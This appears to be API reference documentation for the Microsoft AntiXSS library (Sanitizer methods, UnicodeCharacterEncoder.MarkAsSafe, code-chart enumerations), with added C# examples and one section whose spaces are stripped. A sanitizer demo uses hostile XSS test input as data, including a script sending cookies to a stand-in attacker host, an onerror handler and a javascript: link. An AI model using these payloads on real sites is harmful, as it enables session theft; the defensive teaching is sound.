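            LowerCodeCharts.Default | LowerCodeCharts.GreekAndCoptic | LowerCodeCharts.Cyrillic,
            LowerMidCodeCharts.None,
            MidCodeCharts.None,
            UpperMidCodeCharts.None,
            UpperCodeCharts.None);
    }

    static void Main()
    {
        // With the initial safe list every Greek and Cyrillic letter is emitted as an
        // &#DECIMAL; reference, which is correct XML but hard to read and large.
        Console.WriteLine(BuildElement(Untrusted));
        Console.WriteLine(BuildAttribute(Untrusted));

        AllowGreekAndCyrillic();

        // Now the letters are literal. '<', '>', '"', '(' and ')' are still outside
        // the safe list and remain encoded, so the injected element cannot form.
        Console.WriteLine(BuildElement(Untrusted));
        Console.WriteLine(BuildAttribute(Untrusted));
    }
}
```

Marking a chart as safe only stops the encoder from replacing those characters with numeric references; the ASCII punctuation that carries XML and HTML syntax lives in the Basic Latin chart and is handled by the encoder's own safe list of letters, digits and a few punctuation marks, so widening the charts for international text does not weaken the protection against markup injection.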

Sanitizer Class

Sanitizes input HTML to make it safe to be displayed on a browser by removing potentially dangerous tags.

Namespace: Microsoft.Security.Application
Assembly: HtmlSanitizationLibrary (in HtmlSanitizationLibrary.dll)
Version: 4.2.0.0

Syntax

C#

    public static class Sanitizer

Visual Basic

    Public NotInheritable Class Sanitizer

Visual C++

    public ref class Sanitizer abstract sealed

Remarks

This sanitization library uses the Principle of Inclusions, sometimes referred to as "safe-listing", to provide protection against injection attacks. With safe-listing protection, algorithms look for valid inputs and automatically treat everything outside that set as a potential attack. This library can be used as a defense-in-depth approach with other mitigation techniques.

Inheritance Hierarchy

    System.Object
      Microsoft.Security.Application.Sanitizer

See Also

    Sanitizer Members
    Microsoft.Security.Application Namespace

Sanitizer Members

Methods

    Name                                          Description
    GetSafeHtml(String)                           Sanitizes input HTML document for safe display on browser.
    GetSafeHtml(TextReader, Stream)               Sanitizes input HTML document for safe display on browser.
    GetSafeHtml(TextReader, TextWriter)           Sanitizes input HTML document for safe display on browser.
    GetSafeHtmlFragment(String)                   Sanitizes input HTML fragment for safe display on browser.
    GetSafeHtmlFragment(TextReader, Stream)       Sanitizes input HTML fragment for safe display on browser.
    GetSafeHtmlFragment(TextReader, TextWriter)   Sanitizes input HTML fragment for safe display on browser.

See Also

    Sanitizer Class
    Microsoft.Security.Application Namespace

Sanitizer Methods

Methods

    Name                                          Description
    GetSafeHtml(String)                           Sanitizes input HTML document for safe display on browser.
    GetSafeHtml(TextReader, Stream)               Sanitizes input HTML document for safe display on browser.
    GetSafeHtml(TextReader, TextWriter)           Sanitizes input HTML document for safe display on browser.
    GetSafeHtmlFragment(String)                   Sanitizes input HTML fragment for safe display on browser.
    GetSafeHtmlFragment(TextReader, Stream)       Sanitizes input HTML fragment for safe display on browser.
    GetSafeHtmlFragment(TextReader, TextWriter)   Sanitizes input HTML fragment for safe display on browser.

See Also

    Sanitizer Class
    Microsoft.Security.Application Namespace

Sanitizer.GetSafeHtml Method

Overload List

    Name                                  Description
    GetSafeHtml(String)                   Sanitizes input HTML document for safe display on browser.
    GetSafeHtml(TextReader, Stream)       Sanitizes input HTML document for safe display on browser.
    GetSafeHtml(TextReader, TextWriter)   Sanitizes input HTML document for safe display on browser.

See Also

    Sanitizer Class
    Sanitizer Members
    Microsoft.Security.Application Namespace

Sanitizer.GetSafeHtml Method (String)

Sanitizes input HTML document for safe display on browser.

Namespace: Microsoft.Security.Application
Assembly: HtmlSanitizationLibrary (in HtmlSanitizationLibrary.dll)
Version: 4.2.0.0

Syntax

C#

    public static string GetSafeHtml(
        string input
    )

Visual Basic

    Public Shared Function GetSafeHtml ( _
        input As String _
    ) As String

Visual C++

    public:
    static String^ GetSafeHtml(
        String^ input
    )

Parameters

input
    Type: System.String
    Malicious HTML document.

Return Value

A sanitized HTML document.

Remarks

The method transforms and filters HTML of executable scripts. A safe list of tags and attributes is used to strip dangerous scripts from the HTML. HTML is also normalized, so that tags are properly closed and attributes are properly formatted.

See Also

    Sanitizer Class
    GetSafeHtml Overload
    Microsoft.Security.Application Namespace

Sanitizer.GetSafeHtml Method (TextReader, Stream)

Sanitizes input HTML document for safe display on browser.

Namespace: Microsoft.Security.Application
Assembly: HtmlSanitizationLibrary (in HtmlSanitizationLibrary.dll)
Version: 4.2.0.0

Syntax

C#

    public static void GetSafeHtml(
        TextReader sourceReader,
        Stream destinationStream
    )

Visual Basic

    Public Shared Sub GetSafeHtml ( _
        sourceReader As TextReader, _
        destinationStream As Stream _
    )

Visual C++

    public:
    static void GetSafeHtml(
        TextReader^ sourceReader,
        Stream^ destinationStream
    )

Parameters

sourceReader
    Type: System.IO.TextReader
    Source text reader with malicious HTML.
destinationStream
    Type: System.IO.Stream
    Stream to write safe HTML.

Remarks

The method transforms and filters HTML of executable scripts. A safe list of tags and attributes is used to strip dangerous scripts from the HTML. HTML is also normalized, so that tags are properly closed and attributes are properly formatted.

See Also

    Sanitizer Class
    GetSafeHtml Overload
    Microsoft.Security.Application Namespace

Sanitizer.GetSafeHtml Method (TextReader, TextWriter)

Sanitizes input HTML document for safe display on browser.

Namespace: Microsoft.Security.Application
Assembly: HtmlSanitizationLibrary (in HtmlSanitizationLibrary.dll)
Version: 4.2.0.0

Syntax

C#

    public static void GetSafeHtml(
        TextReader sourceReader,
        TextWriter destinationWriter
    )

Visual Basic

    Public Shared Sub GetSafeHtml ( _
        sourceReader As TextReader, _
        destinationWriter As TextWriter _
    )

Visual C++

    public:
    static void GetSafeHtml(
        TextReader^ sourceReader,
        TextWriter^ destinationWriter
    )

Parameters

sourceReader
    Type: System.IO.TextReader
    Source text reader with malicious HTML.
destinationWriter
    Type: System.IO.TextWriter
    TextWriter to write safe HTML.

Remarks

The method transforms and filters HTML of executable scripts. A safe list of tags and attributes is used to strip dangerous scripts from the HTML. HTML is also normalized, so that tags are properly closed and attributes are properly formatted.

See Also

    Sanitizer Class
    GetSafeHtml Overload
    Microsoft.Security.Application Namespace

Sanitizer.GetSafeHtmlFragment Method

Overload List

    Name                                          Description
    GetSafeHtmlFragment(String)                   Sanitizes input HTML fragment for safe display on browser.
    GetSafeHtmlFragment(TextReader, Stream)       Sanitizes input HTML fragment for safe display on browser.
    GetSafeHtmlFragment(TextReader, TextWriter)   Sanitizes input HTML fragment for safe display on browser.

See Also

    Sanitizer Class
    Sanitizer Members
    Microsoft.Security.Application Namespace

Sanitizer.GetSafeHtmlFragment Method (String)

Sanitizes input HTML fragment for safe display on browser.

Namespace: Microsoft.Security.Application
Assembly: HtmlSanitizationLibrary (in HtmlSanitizationLibrary.dll)
Version: 4.2.0.0

Syntax

C#

    public static string GetSafeHtmlFragment(
        string input
    )

Visual Basic

    Public Shared Function GetSafeHtmlFragment ( _
        input As String _
    ) As String

Visual C++

    public:
    static String^ GetSafeHtmlFragment(
        String^ input
    )

Parameters

input
    Type: System.String
    Malicious HTML fragment.

Return Value

Safe HTML fragment.

Remarks

The method transforms and filters HTML of executable scripts. A safe list of tags and attributes is used to strip dangerous scripts from the HTML. HTML is also normalized, so that tags are properly closed and attributes are properly formatted.

See Also

    Sanitizer Class
    GetSafeHtmlFragment Overload
    Microsoft.Security.Application Namespace

MicrosoftAntiXSSLibrary

Sanitizer.GetSafeHtmlFragmentMethod(TextReader,Stream)SanitizerClassSeeAlso

SanitizesinputHTMLfragmentforsafedisplayonbrowser.

Namespace:Microsoft.Security.ApplicationAssembly:HtmlSanitizationLibrary(inHtmlSanitizationLibrary.dll)Version:4.2.0.0

Syntax

C#

publicstaticvoidGetSafeHtmlFragment(

TextReadersourceReader,

StreamdestinationStream

)

VisualBasic

PublicSharedSubGetSafeHtmlFragment(_

sourceReaderAsTextReader,_

destinationStreamAsStream_

)

VisualC++

public:

staticvoidGetSafeHtmlFragment(

TextReader^sourceReader,

Stream^destinationStream

)

ParameterssourceReaderType:System.IO.TextReaderSourcetextreaderwithmaliciousHTMLdestinationStreamType:System.IO.StreamStreamtowritesafeHTML

RemarksThemethodtransformsandfiltersHTMLofexecutablescripts.AsafelistoftagsandattributesareusedtostripdangerousscriptsfromtheHTML.HTMLisalsonormalizedwheretagsareproperlyclosedandattributesareproperlyformatted.

See Also

Sanitizer Class | GetSafeHtmlFragment Overload | Microsoft.Security.Application Namespace


Sanitizer.GetSafeHtmlFragment Method (TextReader, TextWriter)

Sanitizes an input HTML fragment for safe display in a browser, reading from a text reader and writing the result to a text writer.

Namespace: Microsoft.Security.Application
Assembly: HtmlSanitizationLibrary (in HtmlSanitizationLibrary.dll)
Version: 4.2.0.0

Syntax

C#

    public static void GetSafeHtmlFragment(
        TextReader sourceReader,
        TextWriter destinationWriter
    )

Visual Basic

    Public Shared Sub GetSafeHtmlFragment ( _
        sourceReader As TextReader, _
        destinationWriter As TextWriter _
    )

Visual C++

    public:
    static void GetSafeHtmlFragment(
        TextReader^ sourceReader,
        TextWriter^ destinationWriter
    )

Parameters

sourceReader
    Type: System.IO.TextReader
    Text reader supplying the untrusted HTML.

destinationWriter
    Type: System.IO.TextWriter
    Text writer to which the sanitized HTML is written.

Remarks

The method transforms the input HTML and filters out executable script. A safe list of tags and attributes is used to strip dangerous content from the HTML; anything not on the safe list is removed. The HTML is also normalized: tags are properly closed and attributes are properly formatted.

See Also

Sanitizer Class | GetSafeHtmlFragment Overload | Microsoft.Security.Application Namespace
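The following is an added example, not code from the AntiXSS documentation or the library itself. It exercises the string overload and the TextReader/TextWriter overload of GetSafeHtmlFragment on a constructed, deliberately hostile fragment, and contrasts sanitizing with Encoder.HtmlEncode (the library's encoder class, which is not documented on this page) to make the point that sanitizing is for rich-text input and encoding is for everything else. The input string and the LooksScriptFree check are assumptions for illustration: the reference page does not specify the sanitizer's exact normalized output, so the check looks for the absence of obvious script vectors rather than comparing against an exact string.

```csharp
// Added example (not from the AntiXSS documentation): sanitizing an untrusted
// HTML fragment with Sanitizer.GetSafeHtmlFragment, and contrasting it with
// Encoder.HtmlEncode, which is the right tool when the field is plain text.
// Requires references to HtmlSanitizationLibrary.dll and AntiXssLibrary40.dll.
using System;
using System.IO;
using Microsoft.Security.Application;

class SanitizerDemo
{
    // Constructed input: a comment a user might submit to a site that allows
    // a little rich text (bold, links) but must never let script execute.
    const string UntrustedFragment =
        "<p>Nice <b>article</b>! <a href=\"http://example.com/\">link</a></p>" +
        "<script>document.location='http://attacker.invalid/?c='+document.cookie</script>" +
        "<img src=x onerror=\"alert(1)\">" +
        "<a href=\"javascript:alert(2)\">click</a>";

    // String overload: use when the fragment is already in memory (a form field).
    static string SanitizeString(string fragment)
    {
        return Sanitizer.GetSafeHtmlFragment(fragment);
    }

    // TextReader/TextWriter overload: use when the fragment is large or already
    // streaming (an upload, a request body) so it is not buffered twice.
    // StringReader/StringWriter stand in for real streams in this example; the
    // output character encoding is whatever the TextWriter uses.
    static string SanitizeStreamed(string fragment)
    {
        using (var reader = new StringReader(fragment))
        using (var writer = new StringWriter())
        {
            Sanitizer.GetSafeHtmlFragment(reader, writer);
            return writer.ToString();
        }
    }

    // Smoke check, not a proof (assumption for illustration): the exact output of
    // the sanitizer is not specified on the reference page, so this only confirms
    // that the obvious script vectors in the constructed input did not survive.
    static bool LooksScriptFree(string html)
    {
        string lower = html.ToLowerInvariant();
        return lower.IndexOf("<script", StringComparison.Ordinal) < 0
            && lower.IndexOf("onerror", StringComparison.Ordinal) < 0
            && lower.IndexOf("javascript:", StringComparison.Ordinal) < 0;
    }

    static void Main()
    {
        string viaString = SanitizeString(UntrustedFragment);
        string viaStream = SanitizeStreamed(UntrustedFragment);

        Console.WriteLine("String overload:        " + viaString);
        Console.WriteLine("Streamed overload:      " + viaStream);
        Console.WriteLine("Script-free (string):   " + LooksScriptFree(viaString));
        Console.WriteLine("Script-free (streamed): " + LooksScriptFree(viaStream));

        // Contrast: if the field is supposed to be plain text, do not sanitize,
        // encode. HtmlEncode turns '<', '>', '&' and quotes into entities, so the
        // markup is displayed literally instead of being interpreted. Nothing is
        // lost and there is no safe list to get wrong.
        Console.WriteLine("Encoded instead:        " + Encoder.HtmlEncode(UntrustedFragment));
    }
}
```

Run this once against the exact build you deploy and read the output: if any of the checks prints False, treat the sanitizer's handling of that vector as unverified for your version and add a second layer (restrict the tags you accept, or encode the field on output instead of sanitizing it). Sanitize only where the product genuinely needs user-supplied markup; for every other field, encoding is the simpler and stronger control.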


UnicodeCharacterEncoder Class

Provides HTML encoding support; its public member, MarkAsSafe, controls the Unicode safe list used by the HTML and XML encoding methods.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    public static class UnicodeCharacterEncoder

Visual Basic

    Public NotInheritable Class UnicodeCharacterEncoder

Visual C++

    public ref class UnicodeCharacterEncoder abstract sealed

Inheritance Hierarchy

System.Object
    Microsoft.Security.Application.UnicodeCharacterEncoder

See Also

UnicodeCharacterEncoder Members | Microsoft.Security.Application Namespace


UnicodeCharacterEncoder Members

The UnicodeCharacterEncoder type exposes the following members.

Methods

Name          Description
MarkAsSafe    Marks characters from the specified languages as safe.

See Also

UnicodeCharacterEncoder Class | Microsoft.Security.Application Namespace


UnicodeCharacterEncoder Methods

The UnicodeCharacterEncoder type exposes the following members.

Methods

Name          Description
MarkAsSafe    Marks characters from the specified languages as safe.

See Also

UnicodeCharacterEncoder Class | Microsoft.Security.Application Namespace


UnicodeCharacterEncoder.MarkAsSafe Method

Marks characters from the specified languages as safe.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    public static void MarkAsSafe(
        LowerCodeCharts lowerCodeCharts,
        LowerMidCodeCharts lowerMidCodeCharts,
        MidCodeCharts midCodeCharts,
        UpperMidCodeCharts upperMidCodeCharts,
        UpperCodeCharts upperCodeCharts
    )

Visual Basic

    Public Shared Sub MarkAsSafe ( _
        lowerCodeCharts As LowerCodeCharts, _
        lowerMidCodeCharts As LowerMidCodeCharts, _
        midCodeCharts As MidCodeCharts, _
        upperMidCodeCharts As UpperMidCodeCharts, _
        upperCodeCharts As UpperCodeCharts _
    )

Visual C++

    public:
    static void MarkAsSafe(
        LowerCodeCharts lowerCodeCharts,
        LowerMidCodeCharts lowerMidCodeCharts,
        MidCodeCharts midCodeCharts,
        UpperMidCodeCharts upperMidCodeCharts,
        UpperCodeCharts upperCodeCharts
    )

Parameters

lowerCodeCharts
    Type: Microsoft.Security.Application.LowerCodeCharts
    The combination of lower code charts to use.

lowerMidCodeCharts
    Type: Microsoft.Security.Application.LowerMidCodeCharts
    The combination of lower-mid code charts to use.

midCodeCharts
    Type: Microsoft.Security.Application.MidCodeCharts
    The combination of mid code charts to use.

upperMidCodeCharts
    Type: Microsoft.Security.Application.UpperMidCodeCharts
    The combination of upper-mid code charts to use.

upperCodeCharts
    Type: Microsoft.Security.Application.UpperCodeCharts
    The combination of upper code charts to use.

Remarks

The safe list affects all HTML and XML encoding functions. Because the method is static, the setting applies to every subsequent HTML and XML encoding call in the application, so it should be set once at startup rather than per request. Each parameter is the complete combination of charts for that region; combine the flag values with a bitwise OR. Marking a chart as safe only stops its characters from being entity-encoded; it never makes the HTML-significant characters (angle brackets, ampersand, quotes) safe, and it has no effect on the Sanitizer class.

See Also

UnicodeCharacterEncoder Class | Microsoft.Security.Application Namespace
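The following is an added example, not code from the AntiXSS documentation or the library. It widens the safe list for a Japanese-language site by combining UpperMidCodeCharts and UpperCodeCharts flags from the enumerations documented below, then encodes a constructed display name to confirm two things a practitioner wants to see after changing the list: the kana and kanji pass through as literal characters, and the markup characters are still encoded. LowerCodeCharts.Default and the None members of the lower, lower-mid and mid enumerations are taken from the library's other code-chart enumerations, which this page does not reproduce; Encoder.HtmlEncode is the library's encoder class, also not documented on this page. The input string and the two check functions are assumptions for illustration.

```csharp
// Added example (not from the AntiXSS documentation): widening the Unicode safe
// list with UnicodeCharacterEncoder.MarkAsSafe so Japanese text is emitted
// literally by the HTML encoder, while '<', '>', '&' and quotes stay encoded.
// Requires a reference to AntiXssLibrary40.dll.
// Assumption: LowerCodeCharts.Default and the *.None members come from the
// library's other code-chart enumerations, which are not reproduced on this page.
using System;
using Microsoft.Security.Application;

class SafeListDemo
{
    // Configure the safe list once, at application start (for ASP.NET,
    // Application_Start in Global.asax). The method is static and the remarks
    // say the list affects every HTML and XML encoding function, so this is a
    // process-wide setting: pass the complete combination you want in one call
    // rather than calling it once per chart.
    static void ConfigureForJapanese()
    {
        UnicodeCharacterEncoder.MarkAsSafe(
            LowerCodeCharts.Default,                      // Latin charts (ASCII, Latin-1, Latin Extended)
            LowerMidCodeCharts.None,
            MidCodeCharts.None,
            UpperMidCodeCharts.CjkSymbolsAndPunctuation   // U+3000..U+303F, e.g. the ideographic full stop
            | UpperMidCodeCharts.Hiragana                 // U+3040..U+309F
            | UpperMidCodeCharts.Katakana                 // U+30A0..U+30FF
            | UpperMidCodeCharts.CjkUnifiedIdeographs,    // U+4E00..U+9FFF (kanji)
            UpperCodeCharts.HalfWidthAndFullWidthForms);  // U+FF00..U+FFEF (full-width digits and Latin)
    }

    // Constructed input: a Japanese display name with an injection attempt
    // appended. The name should pass through; the tag must not.
    const string Input = "山田 太郎 <script>alert('xss')</script>";

    static string EncodeForHtml(string s)
    {
        return Encoder.HtmlEncode(s);
    }

    // Check 1: no raw markup character survives encoding, whatever the safe list.
    static bool MarkupStillEncoded(string encoded)
    {
        return encoded.IndexOf('<') < 0 && encoded.IndexOf('>') < 0;
    }

    // Check 2: the safe-listed kanji are literal, not numeric character references.
    static bool KanjiPassedThrough(string encoded)
    {
        return encoded.Contains("山田") && encoded.Contains("太郎");
    }

    static void Main()
    {
        // With the library's default safe list (Latin charts only), characters
        // outside the list are emitted as numeric character references.
        Console.WriteLine("Default list: " + EncodeForHtml(Input));

        ConfigureForJapanese();

        // With the widened list the kana and kanji are literal; '<' and '>' are
        // still entities because the HTML-significant characters are never safe.
        string encoded = EncodeForHtml(Input);
        Console.WriteLine("Widened list:   " + encoded);
        Console.WriteLine("markup encoded: " + MarkupStillEncoded(encoded));
        Console.WriteLine("kanji literal:  " + KanjiPassedThrough(encoded));
    }
}
```

Keep the safe list as narrow as the site's languages require. The cost of a chart that is not safe-listed is only larger output (numeric character references instead of literal characters); the benefit of a narrow list is that every character outside it, including look-alike and bidirectional control characters from charts you did not expect, is rendered harmless by encoding.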


UpperCodeCharts Enumeration

Values for the upper section of the Unicode code charts, covering code points U+A8E0 to U+FFFD. This enumeration has the FlagsAttribute, so members can be combined with a bitwise OR.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    [FlagsAttribute]
    public enum UpperCodeCharts

Visual Basic

    <FlagsAttribute> _
    Public Enumeration UpperCodeCharts

Visual C++

    [FlagsAttribute]
    public enum class UpperCodeCharts

Members

Member name                   Value     Description
None                          0         No code charts from the upper region of the Unicode tables are safe-listed.
DevanagariExtended            1         The Devanagari Extended code table.
KayahLi                       2         The Kayah Li code table.
Rejang                        4         The Rejang code table.
HangulJamoExtendedA           8         The Hangul Jamo Extended-A code table.
Javanese                      16        The Javanese code table.
Cham                          32        The Cham code table.
MyanmarExtendedA              64        The Myanmar Extended-A code table.
TaiViet                       128       The Tai Viet code table.
MeeteiMayek                   256       The Meetei Mayek code table.
HangulSyllables               512       The Hangul Syllables code table.
HangulJamoExtendedB           1024      The Hangul Jamo Extended-B code table.
CjkCompatibilityIdeographs    2048      The CJK Compatibility Ideographs code table.
AlphabeticPresentationForms   4096      The Alphabetic Presentation Forms code table.
ArabicPresentationFormsA      8192      The Arabic Presentation Forms-A code table.
VariationSelectors            16384     The Variation Selectors code table.
VerticalForms                 32768     The Vertical Forms code table.
CombiningHalfMarks            65536     The Combining Half Marks code table.
CjkCompatibilityForms         131072    The CJK Compatibility Forms code table.
SmallFormVariants             262144    The Small Form Variants code table.
ArabicPresentationFormsB      524288    The Arabic Presentation Forms-B code table.
HalfWidthAndFullWidthForms    1048576   The Halfwidth and Fullwidth Forms code table.
Specials                      2097152   The Specials code table.

See Also

Microsoft.Security.Application Namespace


UpperMidCodeCharts Enumeration

Values for the upper-middle section of the Unicode code charts, covering code points U+2DE0 to U+A8DF. This enumeration has the FlagsAttribute, so members can be combined with a bitwise OR.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    [FlagsAttribute]
    public enum UpperMidCodeCharts

Visual Basic

    <FlagsAttribute> _
    Public Enumeration UpperMidCodeCharts

Visual C++

    [FlagsAttribute]
    public enum class UpperMidCodeCharts

Members

Member name                        Value        Description
None                               0            No code charts from the upper-middle region of the Unicode tables are safe-listed.
CyrillicExtendedA                  1            The Cyrillic Extended-A code table.
SupplementalPunctuation            2            The Supplemental Punctuation code table.
CjkRadicalsSupplement              4            The CJK Radicals Supplement code table.
KangxiRadicals                     8            The Kangxi Radicals code table.
IdeographicDescriptionCharacters   16           The Ideographic Description Characters code table.
CjkSymbolsAndPunctuation           32           The CJK Symbols and Punctuation code table.
Hiragana                           64           The Hiragana code table.
Katakana                           128          The Katakana code table.
Bopomofo                           256          The Bopomofo code table.
HangulCompatibilityJamo            512          The Hangul Compatibility Jamo code table.
Kanbun                             1024         The Kanbun code table.
BopomofoExtended                   2048         The Bopomofo Extended code table.
CjkStrokes                         4096         The CJK Strokes code table.
KatakanaPhoneticExtensions         8192         The Katakana Phonetic Extensions code table.
EnclosedCjkLettersAndMonths        16384        The Enclosed CJK Letters and Months code table.
CjkCompatibility                   32768        The CJK Compatibility code table.
CjkUnifiedIdeographsExtensionA     65536        The CJK Unified Ideographs Extension A code table.
YijingHexagramSymbols              131072       The Yijing Hexagram Symbols code table.
CjkUnifiedIdeographs               262144       The CJK Unified Ideographs code table.
YiSyllables                        524288       The Yi Syllables code table.
YiRadicals                         1048576      The Yi Radicals code table.
Lisu                               2097152      The Lisu code table.
Vai                                4194304      The Vai code table.
CyrillicExtendedB                  8388608      The Cyrillic Extended-B code table.
Bamum                              16777216     The Bamum code table.
ModifierToneLetters                33554432     The Modifier Tone Letters code table.
LatinExtendedD                     67108864     The Latin Extended-D code table.
SylotiNagri                        134217728    The Syloti Nagri code table.
CommonIndicNumberForms             268435456    The Common Indic Number Forms code table.
Phagspa                            536870912    The Phags-pa code table.
Saurashtra                         1073741824   The Saurashtra code table.

See Also

Microsoft.Security.Application Namespace
